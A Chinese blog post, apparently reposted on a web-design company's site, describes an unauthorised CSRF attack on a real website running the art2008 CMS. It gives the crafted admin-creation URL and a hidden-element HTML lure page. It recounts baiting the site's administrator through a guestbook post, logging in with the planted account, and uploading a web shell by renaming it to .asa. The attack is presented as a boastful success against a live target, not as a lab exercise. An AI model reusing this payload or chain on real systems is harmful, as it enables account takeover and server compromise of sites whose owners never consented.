一次基于CSRF下的攻击实例

最近想测试一下用CSRF来搞一个站有多快？  于是乎就测试了一下，结果还是挺让人满意的。废话不多说了， 切入正题。 文章没技术含量，望高手别捧腹大笑 - -||

长岛网站建设公司创新互联,长岛网站设计制作，有大型网站制作公司丰富经验。已为长岛上千家提供企业网站建设服务。企业网站搭建\外贸营销网站建设要多少钱，请找那个售后服务好的长岛做网站的公司定做！

我从源码站里下了一套源码，名曰：art2008  我是从增加管理员这里进行CSRF的， 同过抓包 我发现，构造一个链接如：

http://www.xxx.com/admin/admin_admin.asp?
action=savenew&username=11111&PrUserName=11111&
passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code] 

就能够自动增加一个管理员，  于是乎测试了一下，发现可以增加。然后便开始找对象进行试验..

google了一下 ， 找了个管理员经常上的网站进行了测试， 然后我先是在自己空间上建立了以个test.htm 代码如下：

[code]你喜欢包拯吗？ 
http://www.xxx(名字略).com/admin/admin_admin.asp?
action=savenew&username=111111&
PrUserName=111111&passwd=123456&
passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100"> 

然后找到那个网站的留言板，开始留言，如图：

当管理员访问我的网站时候，他便被CSRF了。 就在此后， 我便去玩CS了，战绩还不错- - 杀16死5.

当我回来时候，管理员已经回复了（- - ||真快阿）如图：

管理员应该访问了我的网站，于是我迅雷不及掩耳之势的跑去后台看看有没有成功增加，用户名：111111 密码：123456  结果成功登陆了！！ 如图：

后台后个上传，改了一下扩展名asa  ，马儿便飞到了服务器上，  如图：

大概计算了一下，一共花费了约30分钟左右的时间。

分享标题：一次基于CSRF下的攻击实例
本文网址：http://www.shufengxianlan.com/qtweb/news34/496034.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联